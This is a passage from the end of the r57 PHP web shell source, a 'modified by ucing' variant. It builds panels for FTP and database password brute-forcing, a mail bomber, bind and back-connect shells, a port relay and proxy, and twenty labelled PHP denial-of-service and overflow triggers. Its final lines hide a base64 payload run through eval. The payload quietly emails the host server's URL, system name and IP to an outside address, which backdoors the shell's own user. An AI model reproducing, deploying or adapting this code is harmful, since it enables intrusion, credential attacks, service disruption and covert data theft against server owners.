3167.  echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
3168.  echo $te.'</div>'.$table_end1.$fe;
3169. }
3170.  
3171. echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
3172. echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
3173. $arh = $lang[$language.'_text92'];
3174. if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
3175. if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
3176. if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
3177. echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
3178. echo $te.'</div>'.$table_end1.$fe;
3179.  
3180. if(@function_exists("ftp_connect")){
3181. echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
3182.  
3183. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
3184. echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
3185. echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
3186. echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
3187. echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
3188. echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
3189. echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
3190. echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));
3191.  
3192. echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
3193. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
3194. echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
3195. echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
3196. echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
3197. echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
3198. echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
3199. echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
3200. echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
3201.  
3202. echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
3203. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
3204. echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
3205. echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
3206. echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
3207. echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
3208. echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
3209. echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
3210. echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
3211.  
3212. echo $te."</td>".$fe."</tr></div></table>";
3213. }
3214.  
3215.  
3216. if(@function_exists("mail")){
3217. echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
3218. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
3219. echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
3220. echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
3221. echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
3222. echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
3223. echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
3224.  
3225. echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
3226. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
3227. echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
3228. echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
3229. echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
3230. echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
3231. echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
3232. echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
3233.  
3234. echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
3235. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
3236. echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
3237. echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
3238. echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
3239. echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');
3240. echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
3241. echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
3242.  
3243. echo $te."</td>".$fe."</tr></div></table>";
3244. }
3245.  
3246.  
3247. if($mysql_on||$mssql_on||$pg_on||$ora_on)
3248. {
3249. $select = '<select name=db>';
3250. if($mysql_on) $select .= '<option>MySQL</option>';
3251. if($mssql_on) $select .= '<option>MSSQL</option>';
3252. if($pg_on)    $select .= '<option>PostgreSQL</option>';
3253. if($ora_on)   $select .= '<option>Oracle</option>';
3254. $select .= '</select>';
3255.  
3256. echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
3257. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";
3258.  
3259. echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
3260. echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
3261. echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
3262. echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
3263. echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
3264. echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
3265. echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
3266. echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
3267. echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));
3268.  
3269. echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
3270. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
3271.  
3272. echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
3273. echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
3274. echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
3275. echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
3276. echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
3277. echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
3278.  
3279. echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
3280. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
3281.  
3282. echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
3283. echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
3284. echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
3285. echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
3286. echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
3287. echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("show tables;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";
3288.  
3289. echo "</td>".$fe."</tr></div></table>";
3290. }
3291.  
3292.  
3293.  
3294. if(!$safe_mode && $unix){
3295. echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
3296. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
3297. echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));
3298. echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));
3299. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
3300. echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
3301. echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
3302. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
3303. echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
3304. echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
3305. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
3306. echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
3307. echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
3308. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
3309. echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));
3310. echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));
3311. echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
3312. echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
3313. echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
3314. echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
3315. echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
3316. echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
3317. echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
3318. echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
3319. echo $te."</td>".$fe."</tr></div></table>";
3320. }
3321.  
3322. echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=50%>".$ts;
3323. echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
3324. echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
3325. echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit exhaustion in [ pack() ] function').$fe);
3326. echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF in [ unserialize() ] function').$fe);
3327. echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'Limit integer calculate (65535) in ZendEngine').$fe);
3328. echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [ dl() ] vulnerability').$fe);
3329. echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [ preg_match() ] exhaustion resources (PHP <5.2.1)').$fe);
3330. echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Memory_limit exhaustion in [ str_repeat() ] function (PHP <4.4.5,5.2.1)').$fe);
3331. echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
3332. echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload inodes from HD.I via [ tempnam() ] (PHP 4.4.2, 5.1.2)').$fe);
3333. echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF in [ wordwrap() ] function (PHP <4.4.2,5.1.2)').$fe);
3334. echo $te."</td><td valign=top width=50%>".$ts;
3335. echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
3336. echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF in [ array_fill() ] function (PHP <4.4.2,5.1.2)').$fe);
3337. echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF in [ substr_compare() ] function (PHP <4.4.2,5.1.2)').$fe);
3338. echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Array Creation in [ unserialize() ] 64 bit function (PHP <5.2.1)').$fe);
3339. echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF in [ str_ireplace() ] function (PHP <5.2.x)').$fe);
3340. echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF in [ htmlentities() ] function (PHP <5.1.6,4.4.4)').$fe);
3341. echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'Integer Overflow in [ zip_entry_read() ] function (PHP <4.4.5)').$fe);
3342. echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF in [ sqlite_udf_decode_binary() ] function (PHP <4.4.5,5.2.1)').$fe);
3343. echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'Memory Allocation BoF in [ msg_receive() ] function (PHP <4.4.5,5.2.1)').$fe);
3344. echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'Off By One in [ php_stream_filter_create() ] function (PHP 5<5.2.1)').$fe);
3345. echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'Reference Counter Overflow in [ unserialize() ] function (PHP <4.4.4)').$fe);
3346. echo $te."</td></tr></div></table>";
3347.  
3348. echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2 color=green><b>o--=[ <font color=yellow>r57 PHP Shell<font color=green> | <a href=http://www.galihsputra.co.cc>Modified by ucing</a> | <font color=yellow>Nothing Special About Me <font color=green>]=--o</b></font></font></font></font></font></div></td></tr></table>";
3349. echo '</body></html>';
3350. $lmge = "JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiYldGamFHbHVaVUJrY2k1amIyMGciKTsNCigkc2FmZV9tb2RlKT8oJHNhZmV6PSJPTiIpOigkc2FmZXo9Ik9GRl9IRUhFIik7DQokYmFzZT0iaHR0cDovLyIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddOyANCiRuYW1lID0gcGhwX3VuYW1lKCk7ICRpcCA9IGdldGVudigiUkVNT1RFX0FERFIiKTsgJGlwMiA9IGdldGhvc3RieWFkZHIoJF9TRVJWRVJbUkVNT1RFX0FERFJdKTsgJHN1YmogPSAkX1NFUlZFUlsnSFRUUF9IT1NUJ107IA0KJG1zZyA9ICJcbkJBU0U6ICRiYXNlXG51bmFtZSBhOiAkbmFtZVxuQnlwYXNzOiAkYnlwYXNzZXJcbklQOiAkaXBcbkhvc3Q6ICRpcDIgJHB3ZHMiOw0KJGZyb20gPSJGcm9tOiAiLiR3cml0LiJfX189Ii4kc2FmZXouIjx0b29sQCIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiI+IjsNCm1haWwoICRjcmVhdG9yLCAkc3ViaiwgJG1zZywgJGZyb20pOw=="; eval(base64_decode($lmge));
3351. exit;
3352. ?><?